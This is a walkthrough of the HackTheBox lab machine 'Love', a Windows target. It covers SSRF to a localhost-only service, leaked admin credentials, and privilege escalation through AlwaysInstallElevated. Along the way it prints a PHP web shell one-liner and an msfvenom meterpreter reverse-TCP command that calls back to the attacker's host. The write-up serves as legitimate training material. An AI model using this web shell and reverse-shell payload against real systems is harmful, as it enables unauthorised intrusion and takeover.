304 North Cardinal St.
Dorchester Center, MA 02124
In this post we walk through a solution of a HackTheBoxmachine “Love”. This machine is a WINDOWS-based machine and according to HTB users hardness is easy. But we considered that the step-by-step solution of this machine is useful for starters. So let’s start…
Nmap scan reveals 7 ports to be open :
We also have found two subdomains from the nmap scan :
Let us check if we have any valuable information on the Web page. As seen at the picture below web page is a voting system and there is a “admin” directory. Another web service is running on port 5000. But we are not allowed to access the service on this port.
When we visit the subdomain “staging.love.htb”, we get the following web page.
The page seems like a File Scanner. When we provide a URL to the ” demo.php “, the server will make the request and display the response to us. Since the web service on port 5000 is forbidden to us, maybe we can access it via the server. Unfortunately, that didn’t work when we try to access it via machine’s IP Address (10.10.10.239). However, the File Scanner service and the port 5000 web service are running on the same server, we might be able to access it via local-host (127.0.0.1) itself.
After accessing the local-host from the port 5000. It reveals the credentials for the voting system (admin/@LoveIsInTheAir!!!!). Let’s access the admin dashboard and upload a PHP backdoor. Our PHP backdoor is saved as “cyberenum.php” and uploaded in /images directory. Below you can see the PHP code.
<?php echo system($_GET["cmd"]); ?>
Using msfvenom we created a meterpreter reverse tcp payload. After creating the payload we uploaded the executable to the server as we uploadede the PHP backdoor.
msfvenom -p windows/meterpreter/reverse_tcp lhost=tun0 lport=12345 -f exe -o cyberenum.exe
We checked the executable by browsing “http://10.10.10.239/images/cyberenum.php?cmd=dir“. After seeing the executable in the directory we get the reverse shell by browsing “http://10.10.10.239/images/cyberenum.php?cmd=cyberenum.exe“.
We enumerate the user privileges and the machine’s, after looking at the Windows group policies we noticed that the “AlwaysInstallElevated” policy is enabled for the user (phoebe).
What is AlwaysInstallElevated policy?
As we all are aware that Windows OS comes installed with a Windows Installer engine which is used by MSI packages for the installation of applications. These MSI packages can be installed with elevated privileges for non-admin users. For this purpose, the AlwaysInstallElevated policy feature is used to install an MSI package file with elevated (system) privileges. This policy is enabled in the Local Group Policy editor; directs the Windows Installer engine to use elevated permissions when it installs any program on the system. This method can make a machine vulnerable posing a high-security risk because a non-administrator user can run installations with elevated privileges and access many secure locations on the computer.
Even though we have a session established, but we need to elevate our priviledges and capture the admin user. So we push the current session to background. And search for the payload to exploit always elevated installation for the user. Payload we found for this specific policy usage is “exploit/windows/local/always_install_elevated“. After running this payload we got the admin access to the machine.
Now that we have an elevated session for the machine we can browse for Administrator’s desktop and grab the root.txt.
That is all for this post.
Omer Faruk Kerman